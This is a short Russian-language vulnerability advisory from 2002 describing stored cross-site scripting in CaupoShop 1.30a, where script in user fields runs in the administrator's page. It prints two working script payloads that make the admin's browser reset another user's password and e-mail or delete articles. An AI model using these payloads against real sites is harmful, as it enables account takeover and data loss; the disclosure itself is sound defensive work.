Security Lab

Неавторизованное изменение персональных данных других пользователей в CaupoShop

Дата публикации:14.03.2002
Всего просмотров:1175
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

CaupoShop - Web основанная система осуществления покупок написанная в PHP для Linux, Windows и других Unix систем.
При создании пользователя, JavaScript код может быть включен в большинство полей, связанных с тем пользователем. Если администратор будет просматривать информацию злонамеренно созданного пользователя, сценарий будет выполнент в контексте страницы администрирования CaupoShop. Уязвимость позволяет производить потенциально опасные действия с правами администратора системы (например изменение данных других пользователей или удаление существующих статей).
Пример:

1. Изменение зарегистрированного E-mail другого пользователя:
<script>document.location.href="http://example.com/caupo/admin/
admin_workspace.php?id=X&svTable=csc_customer&bEdit=1&bNew=1
&saField[password]=newpass&saField[email]=blackhat@example.com&
btnEdit=1"</script>

2. Удаление существующих статей:
<script>document.location.href="http://example.com/caupo/admin/
admin_workspace.php?id=1&svTable=csc_article&svDel=YES&btnEdit=1</script>


Уязвимость найдена в Caupo.net CaupoShop 1.30a

 

Ссылки: Источник